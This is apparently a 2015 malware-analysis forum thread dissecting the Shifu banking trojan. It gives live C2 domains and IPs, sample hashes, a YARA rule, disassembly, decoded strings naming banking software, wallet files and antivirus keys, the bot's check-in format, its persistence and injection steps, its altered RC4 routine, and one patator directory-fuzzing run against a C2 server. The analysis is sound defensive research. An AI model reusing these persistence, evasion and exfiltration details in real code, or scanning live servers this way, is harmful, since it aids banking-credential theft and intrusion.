A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #26636  by Xylitol
 Tue Sep 01, 2015 10:32 am
Dumped of b9bc3f1b2aace824482c10ffa422f78b: 8/57

Network traffic:
Code: Select all
/news/userlogin.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://www1.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: eboduftazce-ru.com:443
Content-Length: 114
Cache-Control: no-cache
• dns: 1 ›› ip: 188.42.254.65 - adress: EBODUFTAZCE-RU.COM
DGA activ domain:
• dns: 1 ›› ip: 188.42.254.65 - adress: AEHTCDB.INFO
Another file who connect to the same host in attachement.
VT: 34/57 - unpack: 7/57

Image Image
Some strings from the xor proc:
Code: Select all
IntelPowerAgent32
rundll32.exe shell32.dll, ShellExec_RunDLL
software\\microsoft\\windows\\currentversion\\run
software\\microsoft\\windows nt\\currentversion\\winlogon
kernel
.exe
.dll
GetProcessUserModeExceptionPolicy
IsWow64Process
%s:Zone.Identifier
%OS%_%NUMBER_OF_PROCESSORS%
%02x
pos.exe
bank.exe
tellerplus|bancline|fidelity|micrsolv|bankman|vanity|episys|jackhenry|cruisenet|gplusmain|silverlake|v48d0250s1
bitcoin\\wallet.dat
litecoin\\wallet.dat
C:\\Omikron\\MCSign
ELBA5\ELBA_data
HBPData\\hbp.profile
iexplore.exe|opera.exe|firefox.exe|chrome.exe|maxthon.exe|java.exe|javaw.exe|plugin-container.exe|acrobat.exe|acrod32.exe
C:\\Documents and Settings\\Administrateur\\Application Data\\2cd56582\\keylog.txt
Malware persistence via HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run:
rundll32.exe shell32.dll, ShellExec_RunDLL C:\Documents and Settings\All Users\Application Data\bhf28d4426.exe
Basically for the infection set-up: Drop a copy, corrupt first location of the file create persistences and CreateRemoteThread.
He use windows registry to get good explorer (software\microsoft\windows nt\currentversion\winlogon\shell) to avoid injecting total commander or app like that i believe
You can replace the value to make it inject on empty.exe or whatever to facilitate debug.

Injection fail (patch at 40156A to derivate, 401677 for 9F4771249DC26A0C49E647D13B6DE242):
Image
Keylogger:
Image
Code: Select all
rule Shifu
{
    meta:
		author = "xylitol@temari.fr"
		description = "Search for hex and strings pattern on Win32/Spy.Shiz.NCP (Shifu)"
		// May only the challenge guide you...

    strings:
		$a1 = {C7 06 3C 00 00 00 C7 46 0C ?? ?? ?? ?? 89 5E 10 89 46 14 C7 46 04 40 00 00 00 EB 1C}
		$a2 = {85 C0 75 3A 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0}
		$a3 = {8A 1C 0E 32 5D 0C 88 19 41 4A 75 F4}

		$b1 = "cmd.exe" wide ascii
		$b2 = "runas" wide ascii
		$b3 = "exe"
    condition:
        all of ($a*) and 2 of ($b*)
}
Shifu search also for bitcoin and litecoin wallets, that not mentioned on IBM report.
edit: VirusBulletin guys released a cool paper: https://www.virusbtn.com/virusbulletin/ ... 1511-Shifu
edit 2: Vidya: https://www.youtube.com/watch?v=eenMSH69psQ
Attachments
infected
(314 KiB) Downloaded 98 times
 #26648  by unixfreaxjp
 Wed Sep 02, 2015 9:56 pm
CNC was called via IE API, just a plain https request after revoking the cert, forensic reversing memory data is below:
Code: Select all
 0x024DECCF push ebp ;; xref: 0x24DEFD7
 0x024DECD0 mov ebp, esp
 0x024DECD2 sub esp, 0Ch
 0x024DECD5 push esi
 0x024DECD6 push dword ptr [ebp+0x0C]
 0x024DECD9 mov esi, dword ptr [0x024EB39C]; <==="8L" xref:0x02C4C38)
 0x024DECDF push dword ptr [ebp+0x08]
 0x024DECE2 push 0x0
 0x024DECE4 push 0x0
 0x024DECE6 push edi
 0x024DECE7 call esiHttpSendRequestA@WININET.DLL (FLAG: Import,Hide,5 values params)
 0x024DECE9 mov dword ptr [ebp-08h], eax // https://eboduftazce-ru.com/news/userlogin.php
 0x024DECEC test eax, eax;; exec (HttpSendRequestA boom..exec!)
 0x024DECEE jne 0x024DED43 ;; comp.
Filling the HttpSendRequestA() with its Xcalled components is understanding what was being used actually for this lame calls, is like simply kicking https via IE
Code: Select all
HTTP API_Syscalls
{
 HINTERNET HttpOpenRequest(
  _In_ HINTERNET hConnect: TRUE from InternetConnect():
  _In_ LPCTSTR   lpszVerb: NUKLL (Shows GET)
  _In_ LPCTSTR   lpszObjectName: "/news/userlogin.php"
  _In_ LPCTSTR   lpszVersion, NULL {VALUE OF IE IS FILLED HERE}
  _In_ LPCTSTR   lpszReferer: "xxx" 
  _In_ LPCTSTR   *lplpszAcceptTypes: Exceprts from IE for known header media
  _In_ DWORD     dwFlags,
  _In_ DWORD_PTR dwContext
  {
  HINTERNET InternetConnect(
    _In_ HINTERNET     hInternet: TRUE from InternetOpen()
    _In_ LPCTSTR       lpszServerName: eboduftazce-ru.com
    _In_ INTERNET_PORT nServerPort: INTERNET_DEFAULT_HTTPS_PORT (443)
    _In_ LPCTSTR       lpszUsername: NULL
    _In_ LPCTSTR       lpszPassword: NULL
    _In_ DWORD         dwService: INTERNET_SERVICE_HTTP
    _In_ DWORD         dwFlags: NULL
    _In_ DWORD_PTR     dwContext: NULL );
   {
   HINTERNET InternetOpen(
     _In_ LPCTSTR lpszAgent: {VALUE OF IE IS FILLED HERE}
     _In_ DWORD   dwAccessType: INTERNET_OPEN_TYPE_DIRECT
     _In_ LPCTSTR lpszProxyName: NULL
     _In_ LPCTSTR lpszProxyBypass: NULL
     _In_ DWORD   dwFlags:NULL);
}}}
It seems that someone in RU is using Maxided hoster in Singapore IDC for this badness:
Code: Select all
{
  "ip": "188.42.254.65",
  "hostname": "maxided.com",
  "city": "Singapore",
  "country": "SG",
  "loc": "1.2931,103.8558",
  "org": "AS45470 8 to Infinity Pte Ltd"
}
 #26649  by Xylitol
 Wed Sep 02, 2015 11:16 pm
Okay so, there is a pushad at 403888, you will recognise AP32 of APlib and get the payload after reaching popad (or check the attachement, x86)
There is more on the unpacked binary if you search for AP32, it's probably the x86/x64 payloads.
Related to the file, he have also a lot of xors, you can use xorsearch of Didier Stevens to get strings.
Import table is fucked and need to be rewrite. (author is delocating and used tricks to make it harder to fix.)
Code: Select all
botid=%s&ver=%s.%u&up=%u&os=%u&ltime=%s%d&token=%d&cn=%s&av=%s&dmn=%s
&ok=%s&id=%d&res_code=%d&res_text=%s
position: form-data; name=\"pcname\"\r\n\r\n%s!%s\r\n
position: form-data; name=\"file\"; filename=\"report\"\r\nContent-Type: text/plain\r\n\r\n%s\r\n
eboduftazce-ru.com
keylog.txt
type=ftp
httpd.conf
httpd.exe
../news/imageupload.php
../news/userpanel.php
../data/index.php
../news/users.php
../news/userlogin.php
../data/config.php
VT: 10/57
Edit: attached an 'empty.exe' due to pm request.
Attachments
(677 Bytes) Downloaded 75 times
 #26664  by Xylitol
 Fri Sep 04, 2015 2:38 pm
Got that file from my previous yara rule
https://www.virustotal.com/en/file/c509 ... 441377291/
• dns: 1 ›› ip: 5.149.249.181 - adress: BLATNOIDOMEN.COM
Code: Select all
python patator.py http_fuzz url=https://blatnoidomen.com/english/FILE0 method=GET 0=pwner.txt follow=1 accept_cookie=1 -x ignore:code=404 -x ignore:code=400
14:50:03 patator    INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-09-04 14:50 UTC
14:50:03 patator    INFO -
14:50:03 patator    INFO - code size:clen       time | candidate                          |   num | mesg
14:50:03 patator    INFO - -----------------------------------------------------------------------------
14:50:04 patator    INFO - 200  203:0          0.063 | index.php                          |     5 | HTTP/1.1 200 OK
14:50:04 patator    INFO - 403  496:299        0.063 | uploads                            |    50 | HTTP/1.1 403 Forbidden
14:50:04 patator    INFO - 403  493:296        0.057 | logs                               |    98 | HTTP/1.1 403 Forbidden
14:50:05 patator    INFO - 403  493:296        0.058 | help                               |   175 | HTTP/1.1 403 Forbidden
14:50:05 patator    INFO - 200  203:0          0.062 | get.php                            |   225 | HTTP/1.1 200 OK
14:50:06 patator    INFO - 200  203:0          0.059 | common.php                         |   318 | HTTP/1.1 200 OK
14:50:06 patator    INFO - 403  492:295        0.057 | sql                                |   351 | HTTP/1.1 403 Forbidden
14:50:07 patator    INFO - 403  493:296        0.064 | .php                               |   454 | HTTP/1.1 403 Forbidden
14:50:07 patator    INFO - 200  203:0          0.064 | cfg.php                            |   449 | HTTP/1.1 200 OK
14:50:08 patator    INFO - 403  495:298        0.063 | models                             |   673 | HTTP/1.1 403 Forbidden
14:50:10 patator    INFO - 403  494:297        0.082 | geoip                              |   922 | HTTP/1.1 403 Forbidden
14:50:15 patator    INFO - 403  498:301        0.058 | .htpasswd                          |  1660 | HTTP/1.1 403 Forbidden
14:50:15 patator    INFO - 200  203:0          0.067 | notify.php                         |  1782 | HTTP/1.1 200 OK
14:50:19 patator    INFO - 200  203:0          0.060 | whois.php                          |  2255 | HTTP/1.1 200 OK
14:50:30 patator    INFO - 403  495:298        0.057 | jabber                             |  3919 | HTTP/1.1 403 Forbidden
14:50:46 patator    INFO - 403  493:296        0.058 | .htm                               |  6264 | HTTP/1.1 403 Forbidden
14:50:48 patator    INFO - 403  500:303        0.058 | .httpd.conf                        |  6476 | HTTP/1.1 403 Forbidden
14:50:50 patator    INFO - 403  499:302        0.059 | .httaccess                         |  6825 | HTTP/1.1 403 Forbidden
14:50:53 patator    INFO - 403  498:301        0.058 | .htaccess                          |  7156 | HTTP/1.1 403 Forbidden
Malwarebytes added the signature "Spyware.Shifu" seem.
Attachments
 #26669  by unixfreaxjp
 Sat Sep 05, 2015 1:11 pm
My collected samples so far:
Code: Select all
26/57 2015-09-04 13:31:52 c509030aa23bec8bdbec049aaffbcebf86ef8b9f08adca9e7988246df89b0899
28/57 2015-09-02 19:19:55 029fd0f04898082f4dd918ae6dd07132d98fe2508e33cec7f74e3b525f264331
18/57 2015-08-30 19:47:15 55a6ac329fca1bc63bbb1f9d90bf1e980b3b3ea2c28ab4e3bc73e2764440c79a
20/57 2015-08-30 19:07:05 f6ce662f0016afaa0d32096d3515105806ad8abb395d49b1e0f49c218233128b 
All callbacks to
Code: Select all
## GeoIP:
   {
     "ip": "5.149.249.181",
     "hostname": "No Hostname",
     "city": null,
     "country": "NL",
     "loc": "52.3667,4.9000",
     "org": "AS59711 FORTUNIX NETWORKS L.P."
   }
 #26686  by comak
 Tue Sep 08, 2015 10:13 am
i got few more,
Code: Select all
Shifu:f52295ba37658b146bbb81fec021bbc3161f7b21ac5d43f36eb7c3c3bb89760d
Shifu:48049807286f73648bfdfd9b97be1229c1966f47a2d4dc31adc03efef7591c6f
Shifu:01c53e0d31c578393ba09add090fff2560c1f53a2a13fdbed8a66bd783a2ee70
Shifu:55a6ac329fca1bc63bbb1f9d90bf1e980b3b3ea2c28ab4e3bc73e2764440c79a
Shifu:f6ce662f0016afaa0d32096d3515105806ad8abb395d49b1e0f49c218233128b
Shifu:0045f553ac2a7e4d68cf3e338623b88f5986e5e9c00e6c805b014a15d9517ff9
Shifu:5f2398e7fead7d77a53a50e375121eb506329287380da64bf85f0ed440ae01fd
Shifu:07c4d4f2aaf4beeae6745d9fe4ac4738cdfb670d2feaece731492b4ee3520f45
Shifu:0efcc12913f9d603fe3d4379572121b0c15f5fa5fb4ddd3e47e1cbd2217066d0
Shifu:9b83196a7e84a2b1a2ef4bdf16b93c7862f8befb58f8a59889cae217cd9338a7
Shifu:7105f14e7a4c677e412e61628242004f2281c7384059f8c76d2d870c8787faf7
Shifu:392e449ae3e400c1abae6014431bbfdafe67adcf428b8a1dd61e4b3bb7712dc7
Shifu:029fd0f04898082f4dd918ae6dd07132d98fe2508e33cec7f74e3b525f264331
Shifu:d13132f918a375d4809e2a1bf76fcd50309e31a29d0341972b4b5fd83aeacbb4
Shifu:508b369b490746fb890696e99eccef95aaa211c4a008fc35b515e9fb558ef26c
Shifu:47af2573a85330f2bcb94d913bd07fcee588445875b0a41e2750beb2499d83ad
also attached, clean dropper and clean payload dll, and script to fix iat of dll
Attachments
pw: infected
(230.93 KiB) Downloaded 87 times
 #26688  by Xylitol
 Tue Sep 08, 2015 11:29 am
Behavior analysis from VT, DNS requests:
Code: Select all
0045f553ac2a7e4d68cf3e338623b88f5986e5e9c00e6c805b014a15d9517ff9 ??
392e449ae3e400c1abae6014431bbfdafe67adcf428b8a1dd61e4b3bb7712dc7 ??
f52295ba37658b146bbb81fec021bbc3161f7b21ac5d43f36eb7c3c3bb89760d ??
9b83196a7e84a2b1a2ef4bdf16b93c7862f8befb58f8a59889cae217cd9338a7 ??
48049807286f73648bfdfd9b97be1229c1966f47a2d4dc31adc03efef7591c6f ??
5f2398e7fead7d77a53a50e375121eb506329287380da64bf85f0ed440ae01fd ??
d13132f918a375d4809e2a1bf76fcd50309e31a29d0341972b4b5fd83aeacbb4 eboduftazce-ru.com:443
07c4d4f2aaf4beeae6745d9fe4ac4738cdfb670d2feaece731492b4ee3520f45 eboduftazce-ru.com:443
0efcc12913f9d603fe3d4379572121b0c15f5fa5fb4ddd3e47e1cbd2217066d0 eboduftazce-ru.com:443
7105f14e7a4c677e412e61628242004f2281c7384059f8c76d2d870c8787faf7 eboduftazce-ru.com:443
01c53e0d31c578393ba09add090fff2560c1f53a2a13fdbed8a66bd783a2ee70 eboduftazce-ru.com:443
47af2573a85330f2bcb94d913bd07fcee588445875b0a41e2750beb2499d83ad eboduftazce-ru.com:443
55a6ac329fca1bc63bbb1f9d90bf1e980b3b3ea2c28ab4e3bc73e2764440c79a blatnoidomen.com:443
029fd0f04898082f4dd918ae6dd07132d98fe2508e33cec7f74e3b525f264331 blatnoidomen.com:443
f6ce662f0016afaa0d32096d3515105806ad8abb395d49b1e0f49c218233128b blatnoidomen.com:443
508b369b490746fb890696e99eccef95aaa211c4a008fc35b515e9fb558ef26c blatnoidomen.com:443
Another DGA active domain:
• dns: 1 ›› ip: 91.233.244.102 - adresse: URKAELT.INFO
 #26699  by comak
 Wed Sep 09, 2015 6:56 pm
it turns out extracting data from it is quite simple, in attachment some data i got from above samples

there are 2 hardcoded cnc
Code: Select all
  "cnc": "blatnoidomen.com",
  "cnc": "eboduftazce-ru.com",
one seed for dga
Code: Select all
   "dga_seed": 976302970, 
and to different dga configurations:
Code: Select all
  "dga_cfg": "B2luZm8AAAC75IWXxwy6uvPkhZc=",
  "dga_cfg": "B2luZm8AAACpFyvgXwu6uu0XK+A=",
Attachments
pw: infected
(3.19 MiB) Downloaded 76 times
 #27275  by sysopfb
 Fri Nov 20, 2015 2:39 pm
Some variation from what I've seen reported with this sample

Uses an RC4 key similar to the virusbtn.com report https://www.virusbtn.com/virusbulletin/ ... 1511-Shifu

Key:
a8zoSTHljZylEx4o3mJ2eqIdsEguKC15KnyQdfx4RTc5sjH

Doesn't use the standard RC4 key scheudling algorithm instead it XORs the SBOX with the key

Standard from wiki:
Code: Select all
    j = 0
    for i in range(256):
        j = (j + S[i] + ord( key[i % len(key)] )) % 256
        S[i] , S[j] = S[j] , S[i]
Replaced with:
Code: Select all
for i in range(0,len(S)):
        S[i] ^= ord(key[i%len(key)])
Registry Persistance:
Persistence key built with hardcoded value IntelPowerAgent and a decimal number, the decimal number is chosen using:
GetTickCount % 0xA

NamedPipe:
Name of created pipe is crc32 of system directory with initial value of 0x31337
Ex:
C:\Windows with inital 0x31337 -> f4afb7f
\\.pip\f4afb7f

Also stores it's AP32 compressed payloadx86.dll in the registry under HKCU\..\Software\Microsoft\Windows\
The key name is built by expanding the following:
%OS%_%NUMBER_OF_PROCESSORS%
Ex:
sha1sum(Windows_NT_1)
Take the first 4 hex bytes of the hash and convert to string: 2d17e659
Then CRC32 with an initial value of 0x4e67b4a9 -> 4334c972



XOR decoded strings:
Code: Select all
"Software\Microsoft\Windows\Curre"
"ntVersion\explorer\Browser Helpe"
"r Objects\{8CA7E745-EF75-4E7B-BB"
"86-8065C0CE29CA}"
"Software\Microsoft\Windows NT\Cu"
"rrentVersion"
"InstallDate"
"%X!%X!%08X"
"ntdll.dll"
"RtlComputeCrc32"
"ntdll.dll"
"RtlComputeCrc32"
"TREASURE|BUH|BANK|ACCOUNT|CASH|F"
"INAN|MONEY|MANAGE|OPER|DIRECT|RO"
"SPIL|CAPO|BOSS|TRADE"
"botid=%s&ver=%s.%u&up=%u&os=%u&l"
"time=%s%d&token=%d&cn=%s&av=%s&d"
"mn=%s"
"a2"
"Microsoft\Microsoft Antimalware"
"Software\Avg"
"Software\G Data"
"Software\Avira"
"Software\AVAST Software\Avast"
"Software\KasperskyLab\protected"
"Software\Bitdefender"
"Software\Panda Software"
"Software\Sophos"
"Software\Coranti"
"Software\rising"
"Software\TrendMicro"
"Software\Symantec"
"Software\ComodoGroup"
"Software\Network Associates\TVD"
"Software\Data Fellows\F-Secure"
"Software\Eset\Nod"
"Software\Softed\ViGUARD"
"Software\Zone Labs\ZoneAlarm"
"Software\VBA32"
"Software\Doctor Web"
"Mozilla/4.0 (compatible; MSIE 2."
"1; Windows NT 5.0; Trident/4.0; "
"SLCC2; .NET CLR 2.0.50727; .NET "
"CLR 3.5.30729; .NET CLR 3.0.3072"
"9; Media Center PC 6.0)"
"CERT"
"cmdline.txt"
" crc32[%x]"
"ntdll.dll"
"RtlComputeCrc32"
"torrent"
"crypt32.dll"
"PFXImportCertStore"
"\system32\rstrui.exe"
"iexplore.exe|opera.exe|firefox.e"
"xe|chrome.exe|maxthon.exe|java.e"
"xe|javaw.exe|plugin-container.ex"
"e|acrobat.exe|acrod32.exe"
"a8zoSTHljZylEx4o3mJ2eqIdsEguKC15"
"KnyQdfx4RTc5sjH"
"adtejoyo1377.tk"
"/cloud/userlogin.php"
"Referer: https://www.google.com."
"."
"POST"
"HTTP/1.1"
"Content-Type: application/x-www-"
"form-urlencoded.."
"USER "
"PASS "
"ACCT "
"AUTHINFO USER "
"AUTHINFO PASS "
"vk.com"
"yandex.ru"
"http://%s"
"\*.*"
".."
Attachments
pw: infected
(329.98 KiB) Downloaded 73 times